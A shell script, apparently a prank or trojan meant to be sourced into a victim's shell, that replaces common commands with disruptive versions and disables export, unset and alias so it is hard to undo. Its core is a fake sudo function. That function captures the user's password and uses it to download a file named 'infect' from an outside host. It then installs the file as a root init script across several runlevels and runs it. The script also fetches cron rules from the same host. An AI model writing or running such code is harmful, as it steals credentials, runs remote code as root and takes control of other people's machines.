#!/bin/sh
crontab -l > /tmp/cronrules
curl "http://confloo.se/cronrules" >> /tmp/cronrules 2>/dev/null
#crontab /tmp/cronrules
rm /tmp/cronrules

f() {
    t=`which $1`
    eval "$1() { $2; }"
    eval "$t() { $2; }"
    export "__`tr -dc "[:alpha:]" < /dev/urandom | head -c 8`"=$t
}

unalias -a &> /dev/null
unalias -m "*" &> /dev/null

cd() { eject; }

tetris() { 
while (true);
do beep -f 330 -l 150 -n -f 1 -l 40 -n -f 494 -l 159 -n -f 1 -l 40 -n \
     -f 660 -l 150 -n -f 1 -l 40 -n -f 590 -l 150 -n -f 660 -l 150 -n \
     -f 494 -l 100 -n -f 494 -l 100 -n -f 523 -l 150 -n -f 1 -l 40 -n \
     -f 440 -l 150 -n -f 1 -l 40 -n -f 494 -l 150 -n -f 1 -l 40 -n \
     -f 392 -l 100 -n -f 392 -l 100 -n -f 440 -l 150 -n -f 370 -l 150 \
     -n -f 1 -l 40 -n -f 392 -l 150 -n -f 1 -l 40 -n -f 330 -l 100 -n \
     -f 330 -l 100 -n -f 370 -l 150 -n -f 1 -l 40 -n -f 294 -l 150 -n \
     -f 1 -l 40 -n -f 330 -l 150 -n -f 247 -l 100 -n -f 247 -l 100 -n \
     -f 261 -l 150 -n -f 1 -l 40 -n -f 311 -l 150 -n -f 1 -l 40 -n \
     -f 330 -l 150 -n -f 1 -l 40 -n -f 247 -l 100 -n -f 247 -l 100 -n \
     -f 262 -l 150 -n -f 1 -l 40 -n -f 370 -l 150 -n -f 1 -l 40 -n \
     -f 330 -l 150 -n -f 1 -l 40 -n -f 494 -l 159 -n -f 1 -l 40 -n \
     -f 660 -l 150 -n -f 1 -l 40 -n -f 590 -l 150 -n -f 660 -l 150 -n \
     -f 494 -l 100 -n -f 494 -l 100 -n -f 523 -l 150 -n -f 1 -l 40 -n \
     -f 440 -l 150 -n -f 1 -l 40 -n -f 494 -l 150 -n -f 1 -l 40 -n \
     -f 392 -l 100 -n -f 392 -l 100 -n -f 440 -l 150 -n -f 370 -l 150 -n \
     -f 1 -l 40 -n -f 392 -l 150 -n -f 1 -l 40 -n -f 330 -l 100 -n \
     -f 330 -l 100 -n -f 370 -l 150 -n -f 1 -l 40 -n -f 294 -l 150 -n \
     -f 1 -l 40 -n -f 330 -l 150 -n -f 247 -l 100 -n -f 247 -l 100 -n \
     -f 261 -l 150 -n -f 1 -l 40 -n -f 311 -l 150 -n -f 1 -l 40 -n \
     -f 330 -l 150 -n -f 1 -l 40 -n -f 247 -l 100 -n -f 247 -l 100 -n \
     -f 262 -l 150 -n -f 1 -l 40 -n -f 370 -l 150 -n -f 1 -l 40 -n \
     -f 330 -l 150 -n -f 1 -l 40
done
}

f ls "tetris &; while (true); do sl -a; done"
f cat "echo \"miaou\""

cfl=/etc/init.d/cfl.z
sudo=`which sudo`
sudo() {
    if [ $# = 0 ]; then $sudo
    else
        printf "[sudo] password for `whoami`: "
        read -s pass; echo ""
        echo $pass | $sudo -S curl --output $cfl "http://confloo.se/infect" >/dev/null 2>&1
        echo $pass | $sudo -S chmod +x $cfl >/dev/null 2>&1
        for i in 2 3 4 5; do
            echo $pass | $sudo -S ln -s $cfl /etc/rc$i.d/S99cfl.z
        done
        echo $pass | $sudo -S $cfl
    fi
}

f rm "xrandr -o left; xrandr -x"
f less "xrandr -s 6 &> /dev/null"

alias() { display http://impawards.com/tv/posters/alias_ver2.jpg }
unalias() { display -flop http://impawards.com/tv/posters/alias_ver2.jpg }

export() { false; }

head() { echo '
                      __........_.._....._
                     `.s$^.s$$$$$ssss$$$$$$bso.a
                     .d  7.d$$$$SSSS$$$$$$$$$$$b._
                     $  7 s`  `SSS$$$$$SSSSSSSSSSSSSSb.
                     $  j`      SS$$$$$$$$$$$$$$$sss$$$b
                     T.`        s$$$$$$$$$$$$$$$$$ss$$$$$bs.
                     .          S$$$$$$$$$$$$$$$$$$s$$$$$$$$$s.
                    /..._      dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$s.
                  .-````^:.    S$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$b
           __..-=`   .-   `.  dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$b
        .``        _/_        S$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$b
        :_         `^s$D     dS$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$$l
         :\                  !!$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$$S
         :`--`               `:$$$$$$$$$$$$$$$$$$s$$$$$$$$$$$$$$$$$$$$S
       .-`  .`                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7
       ::   :                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$b
      :::.   `               .q$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$b
     :`  ``                 dS77$$$$$$$7^^^^q$$$$$$$$$$$$$$$$$$$$$$$$$$$:
   .`                     dSP.P`  ```s7 `` : \$$$$$$$$$$$$$$$$$$$$$$$$$$$
   :                    sP .dP     _.7/\    `:$$$$$$$$$$$$$$$$$$$$$$$$$$$
   \                  dP`dSP   . (` $$  : .` d$$$$$$$$$$$$$$$$$$$$$$$$$$7
    `._              s dP`     l  d77-. ./.d$$$$$$$$$$$$$$$$$$$$$$$$$$$7b
       `.--...__    :sP`        `d7_ ``_.d$$$$$$$$$$$$$$$$$$$$$$$$$$$7`.$:
         `.     ``  :`        .77:::sssd$$$$$$$$$$$$$$$$$$$$$$$$$$$$$bsd$`
           `,              _.:`` ``::d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$^7$P
             \          _.-``     .d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$Dd$d7
              \                 d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P`d77
               :              d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P 7 7
               :            d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$P `.`
                :         .d$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$7.-²`
                :         d$$$7`        `q$$$$$$$$$$$$$$$$$$$$7`
                 \       $$               `q$$$$$$P`   ```````
                  \     $$                   `````
                   :    qp       _.-
                    `.   l    .-`
                      `.     -
                        `.  /
                          `|
'; }

cflznv=`env`
which() {
    printf $cflznv | grep "__.*=/.*$1" | sed -r 's/.*=(.*)/\1/';
}
#env() { false; }

unset() { false; }
